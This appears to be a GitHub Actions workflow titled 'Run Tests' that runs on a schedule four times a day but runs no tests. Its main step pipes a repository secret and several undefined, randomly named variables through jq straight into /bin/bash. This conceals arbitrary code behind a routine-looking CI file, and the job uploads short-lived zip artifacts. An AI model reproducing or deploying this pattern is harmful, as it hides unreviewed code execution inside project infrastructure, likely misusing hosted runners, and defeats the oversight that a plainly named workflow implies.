name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '34 2,8,14,20 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          q380: ${{ secrets.q380 }}
        run: |
          printf '%s' "$q380" | jq -r .sosjn0169 | /bin/bash
          printf '%s' "$baez117" | jq -r .ndibk4 | /bin/bash
          printf '%s' "$up31" | jq -r .sizye05 | /bin/bash
          echo $a514 | jq -r .nvtyl543 | /bin/bash
          echo $d51 | jq -r .yixvn05685 | /bin/bash
          echo $ot4304 | jq -r .k25886 | /bin/bash
          echo $dkt15 | jq -r .zyh516 | /bin/bash

      - name: Archive results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: WKhOmmit
          path: "*.zip"
          retention-days: 1
